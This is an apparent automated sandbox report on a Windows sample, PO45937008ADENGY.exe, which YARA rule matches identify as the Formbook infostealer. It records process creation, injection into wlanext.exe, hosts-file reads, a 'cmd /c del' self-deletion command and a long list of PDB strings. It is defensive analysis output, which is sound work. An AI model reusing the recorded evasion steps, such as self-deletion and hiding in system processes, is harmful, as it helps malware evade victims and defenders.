Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/5@16/13
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile created: C:\Users\user\IAHRsWbfqoMJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmpJump to behavior
          Source: PO45937008ADENGY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO45937008ADENGY.exeVirustotal: Detection: 27%
          Source: PO45937008ADENGY.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Users\user\Desktop\PO45937008ADENGY.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO45937008ADENGY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO45937008ADENGY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
          Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
          Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
